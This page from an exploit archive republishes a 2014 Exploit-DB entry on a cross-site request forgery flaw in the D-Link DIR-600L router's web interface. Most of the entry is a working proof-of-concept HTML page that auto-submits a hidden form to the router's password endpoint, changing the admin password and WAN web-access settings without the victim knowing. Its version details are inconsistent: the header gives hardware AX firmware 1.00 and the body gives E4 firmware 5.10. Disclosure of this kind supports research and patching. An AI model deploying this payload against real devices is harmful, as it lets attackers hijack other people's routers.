Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Dlink DIR-600L Hardware Version AX Firmware Version 1.00 CSRF Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
DIR-600L
by:
Dhruv Shah
N/A
CVSS
N/A
Cross Site Request Forgery
Unknown
CWE
Product Name: DIR-600L
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Router Web Server
2014

Dlink DIR-600L Hardware Version AX Firmware Version 1.00 CSRF Vulnerability

This Modem's Web Application suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. The Modems's Application not using any security token to prevent it against CSRF. You can manipulate any userdata. PoC and Exploit to change user password:

Mitigation:

Unknown
Source

Exploit-DB raw data:

####################################################################################

# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00
CSRF Vulnerability
# Google Dork: N/A
# Date: 20/03/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
# Software Link: N/A
# Hardware Version:E4

# Firmware Version:5.10
# Tested on: Router Web Server
# CVE : N/A

###################################################################################

 Cross Site Request Forgery



This Modem's Web Application , suffers from Cross-site request forgery

through which attacker can manipulate user data via sending him malicious

craft url.



The Modems's Application  not using any security token to prevent it

against CSRF. You can manipulate any userdata. PoC and Exploit to change

user password:


In the POC the IP address in the POST is the modems IP address.

<html>

  <body>
    <form id ="poc" action="http://192.168.0.1/goform/formSetPassword"
method="POST">
      <input type="hidden" name="settingsChanged" value="1" />
      <input type="hidden" name="config.login_name" value="admin" />
      <input type="hidden" name="config.password" value="YWRtaW4A" />
      <input type="hidden"
name="config.web_server_allow_graphics_auth"
value="false" />
      <input type="hidden"
name="config.web_server_allow_wan_http" value="false" />
      <input type="hidden"
name="config.web_server_wan_port_http" value="8080" />
      <input type="hidden"
name="config.wan_web_ingress_filter_name" value="" />
      <input type="hidden" name="wan_ingress_filter_details"
value="" />
    </form>
  </body>
    <script type="text/javascript">
document.getElementById("poc").submit();
</script>

</html>


______________________

*Dhruv Shah* *aka Snypter*

Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>